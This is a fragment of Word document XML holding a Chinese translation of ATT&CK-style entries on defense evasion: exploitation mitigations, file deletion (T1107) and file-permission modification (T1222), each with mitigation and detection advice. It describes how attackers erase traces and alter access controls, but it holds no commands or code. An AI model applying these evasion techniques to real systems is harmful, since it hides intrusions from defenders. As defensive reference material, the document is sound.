            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和增强型缓解体验工具包</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>（</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:t>EMET</w:t>
            </w:r>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>），可用于缓解某些利用行为。控制流完整性检查是潜在识别和阻止软件漏洞发生的另一种方法。其中许多保护依赖于体系结构和目标应用程序二进制兼容性，并且可能不适用于针对防御规避的软件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00D12CC9" w14:paraId="6038143C" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26803296" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>威胁情报计划</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F216BFA" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>开发强大的网络威胁情报功能，以确定哪些类型和级别的威胁可能使用软件漏洞和零日漏洞针对特定组织。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00D12CC9" w14:paraId="19B287B1" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2294" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="626D2766" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>更新软件</w:t>
            </w:r>
            <w:hyperlink r:id="rId104" w:history="1"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7442" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="108D5996" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00D12CC9" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00D12CC9">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通过为内部企业端点和服务器采用修补程序管理来定期更新软件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="710C4D9E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000A88B5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>在系统遭到破坏后不久，可能会利用防御规避，以防止在以后操作中检测可能引入和使用的其他工具。根据可用的工具，检测软件利用可能很困难。软件漏洞可能并不总是成功，或者可能导致被利用的进程变得不稳定或崩溃。还要在系统上查找可能指示成功危害的行为，例如进程的异常行为。这可能包括写入磁盘的可疑文件、用于隐藏执行或发现证据的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A1580B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>流程注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="zh-Hans"/>
        </w:rPr>
        <w:t>证据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2B4738" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>删除</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="42B3048F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A58036B" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1107</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D87D958" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FA9C4A9" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EEA4A02" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D25F490" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程命令行参数，二进制文件元数据</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5423F6E0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>主机</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>取证分析</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02C2E2EB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Walker Johnson</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0988084C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="68C2AE37" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FA26174" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:t>攻击者在系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>丢弃或创建</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意软件、工具或其他非本机文件，可能会留下在网络中所做事情和如何做的痕迹。攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在入侵过程中删除这些文件减少他们</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的行动足迹</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或者在入侵后清理过程的最后删除文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63816113" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="scite-citeref-number"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机操作系统提供了清理工具，但攻击者也可能使用其他工具。例如，本地</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CMD</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DEL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）、安全删除工具（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Sysinternals sDelete</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），或其他第三方文件删除工具。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7576101C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D54E5D3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D01BFF8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="572E71A5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>环境中与良性命令行功能（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>DEL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或第三方实用程序或工具）相关的事件可能不常见，具体取决于用户群和系统的典型使用方式。监控命令行删除功能从而发现攻击者丢弃和删除的二进制或其他的文件可能会导致恶意活动检测。另一个好的实践是监控已知的删除和安全删除工具，这些工具不在攻击者可能会使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>企业网络的系统上。某些监控工具可能会收集命令行参数，但可能不会捕获</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>DEL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>DEL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cmd.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自带</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCABE01" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>权限修改</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1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81"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="06FCD77D" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8181" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BE7F7E5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1222</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D1DC344" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>防御逃逸</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69D8CE95" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D7A23E3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：用户，管理员，系统，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>root</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11BF9BAD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程监控，进程命令行参数，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>事件日志</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EC3F803" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>绕过的防御：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>系统访问控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F0E85D3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Jan Miller</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>CrowdStrike</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B30B783" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:lastRenderedPageBreak/>
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CE3810C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EDA6A66" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件权限通常由文件属主指定的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DACL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（自由访问控制列表）管理。文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>DACL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的实现可能因平台而异，但通常会明确指定哪些用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>组可以执行哪些操作（例如：读、写、执行等）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C309802" w14:textId="1BA964F2" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改文件权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>属性从而避开预期的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DACL</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。他们可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更改特定的访问权限来实施恶意活动，如修改、替换或删除特定文件。前提是根据</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>文件的现有权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>取得文件的所有权和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或提升权限（如管理员</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根用户权限）。修改特定文件可能是许多技术必需的步骤，例如通过</w:t>
      </w:r>
      <w:r w:rsidR="00BE6ED6">
        <w:t>辅助功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、登录脚本建立持久性，或者污染</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>劫持其他工具二进制</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F444D1C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
